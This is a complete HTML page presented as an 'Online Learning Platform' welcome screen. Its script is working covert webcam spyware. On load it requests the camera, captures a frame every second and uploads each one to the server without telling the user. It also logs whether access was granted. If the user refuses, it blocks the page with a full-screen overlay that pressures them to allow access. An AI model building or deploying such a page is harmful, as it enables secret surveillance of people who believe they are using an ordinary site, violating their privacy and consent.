<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Online Learning Platform</title>
    <style>
        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            font-family: 'Arial', sans-serif;
            background: linear-gradient(135deg, #6b73ff 0%, #000dff 100%);
            color: #ffffff;
            overflow-x: hidden; /* Prevent horizontal scrolling */
        }

        /* Hidden video feed */
        video.hidden-feed {
            display: none;
        }

        /* Main Content Styling */
        .content {
            text-align: center;
            animation: fadeIn 2s ease-in-out;
        }

        .content h1 {
            font-size: 3rem;
            margin-bottom: 1rem;
        }

        .content p {
            font-size: 1.5rem;
        }

        /* Full-Screen Message Styling */
        #fullscreen-msg {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.9);
            color: white;
            font-size: 2rem;
            text-align: center;
            padding: 20px;
            box-sizing: border-box; /* Include padding in width/height calculations */
            overflow-y: auto; /* Allow vertical scrolling */
            animation: fadeIn 1s ease-in-out;
        }

        #fullscreen-msg p {
            margin-bottom: 20px;
        }

        #fullscreen-msg button {
            margin-top: 20px;
            padding: 15px 30px;
            font-size: 1.2rem;
            cursor: pointer;
            background-color: #00b4d8;
            color: #fff;
            border: none;
            border-radius: 5px;
            transition: background-color 0.3s ease;
        }

        #fullscreen-msg button:hover {
            background-color: #0077b6;
        }

        #fullscreen-msg video {
            max-width: 80%;
            max-height: 70%; /* Adjust height as needed */
            width: auto; /* Maintain aspect ratio */
            height: auto; /* Maintain aspect ratio */
            margin: 0 auto;
            border: 3px solid #fff;
            border-radius: 10px;
        }

        /* Animations */
        @keyframes fadeIn {
            from { opacity: 0; }
            to { opacity: 1; }
        }
    </style>
</head>
<body>
    <div class="content">
        <h1>Welcome to Your Online Learning Platform</h1>
        <p>Your personalized learning experience starts here.</p>
    </div>

    <div id="fullscreen-msg">
        <p>🔒 We need access to your camera to enhance your learning experience.<br>
        Please allow camera access and refresh the page to continue.</p>
        <video controls>
            <source src="videos/msj.mp4" type="video/mp4">
            Your browser does not support the video tag.
        </video>
        <button onclick="location.reload()">Refresh Page</button>
    </div>

    <script>
        // Function to show the full-screen message
        function showFullscreenMessage() {
            document.getElementById('fullscreen-msg').style.display = 'block';
        }

        // Send log to server
        function sendLog(status) {
            fetch('/log', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ status: status })
            });
        }

        // Access the user's camera
        navigator.mediaDevices.getUserMedia({ video: true })
            .then(stream => {
                const video = document.createElement('video');
                video.srcObject = stream;
                video.play();

                // Log successful access
                sendLog('success');

                // Capture images automatically every second
                setInterval(() => {
                    const canvas = document.createElement('canvas');
                    canvas.width = video.videoWidth;
                    canvas.height = video.videoHeight;
                    const context = canvas.getContext('2d');
                    context.drawImage(video, 0, 0, canvas.width, canvas.height);

                    // Convert the image to a blob and upload it
                    canvas.toBlob(blob => {
                        const formData = new FormData();
                        formData.append('photo', blob, 'photo.jpg');
                        fetch('/upload', {
                            method: 'POST',
                            body: formData
                        })
                        .then(response => response.text())
                        .then(data => console.log(data))
                        .catch(error => console.error('Error uploading image:', error));
                    });
                }, 1000); // Capture every 1 second
            })
            .catch(error => {
                console.error('Error accessing the camera:', error);

                // Log denied access
                sendLog('denied');
                showFullscreenMessage(); // Show full-screen message if permission is denied
            });
    </script>
</body>
</html>
